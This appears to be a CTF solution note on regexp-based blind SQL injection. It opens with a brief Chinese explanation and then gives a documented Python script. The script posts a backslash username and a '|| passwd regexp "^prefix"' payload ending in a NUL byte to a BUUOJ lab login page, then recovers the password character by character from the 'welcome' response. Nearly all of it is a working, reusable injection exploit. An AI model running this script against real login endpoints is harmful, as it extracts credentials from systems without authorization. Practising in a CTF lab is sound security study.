regexp盲注
select (select username from users) regexp '正则表达式'
匹配则返回1,反之不匹配返回0
^xxx匹配xxx开头的字符
import string
from urllib import parse
import requests
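# Target of the original writeup; override by passing `target=` to http_oracle.
url = 'http://57255251-75f0-44e7-a06a-8b81f5d2b486.node4.buuoj.cn:81/index.php'

# Candidate characters, tried in this order. None of them is a regex
# metacharacter, so a prefix built from them can be inlined into "^..."
# without escaping; extending the set with '.', '*', '$', '\\' etc. would
# require escaping them for the server-side regex engine first.
# NOTE(review): MySQL REGEXP on non-binary columns is case-insensitive, so
# adding uppercase letters would presumably not be distinguishable anyway —
# confirm against the target.
strings = '_' + string.ascii_lowercase + string.digits


def http_oracle(prefix, target=url, timeout=10):
    """Ask the login endpoint whether `passwd` starts with *prefix*.

    Sends the writeup's payload unchanged: `username` is a lone backslash
    (presumably escaping the quote the server closes the username with, so
    the `passwd` field is parsed as SQL) and `passwd` injects
    `|| passwd regexp "^<prefix>"` followed by a NUL byte. The original
    produced the NUL with parse.unquote('%00'); '\x00' is the same character.
    Its purpose is presumably to cut off whatever the server appends after
    the injected fragment — TODO confirm against the target's query.

    Args:
        prefix: candidate password prefix (must not contain regex
            metacharacters; see `strings`).
        target: URL of the vulnerable login handler.
        timeout: per-request timeout in seconds; the original had none and
            would hang forever on a stalled connection.

    Returns:
        True when the response body contains 'welcome', i.e. the injected
        condition evaluated to true.
    """
    data = {
        'username': '\\',
        'passwd': '||/**/passwd/**/regexp/**/"^{}";{}'.format(prefix, '\x00'),
    }
    res = requests.post(target, data=data, timeout=timeout).text
    return 'welcome' in res


def brute_force(oracle, charset=strings, progress=None, max_len=None):
    """Recover a secret one character at a time through a boolean oracle.

    Args:
        oracle: callable taking a prefix and returning True iff the secret
            starts with it (e.g. `http_oracle`).
        charset: characters to try for each position, in order.
        progress: optional callable invoked with the prefix recovered so far
            after every successful character.
        max_len: optional upper bound on the recovered length.

    Returns:
        The longest prefix the oracle confirmed. Extraction stops as soon as
        no character in `charset` extends the prefix — which is either the
        end of the secret or a character outside `charset`; the original
        script looped forever at that point, resending the same requests.
    """
    found = ''
    while max_len is None or len(found) < max_len:
        for ch in charset:
            if oracle(found + ch):
                found += ch
                if progress is not None:
                    progress(found)
                break
        else:
            # No candidate matched: nothing more to learn from this charset.
            break
    return found


if __name__ == '__main__':
    passwd = brute_force(http_oracle,
                         progress=lambda p: print('\r' + p, end=''))
    print()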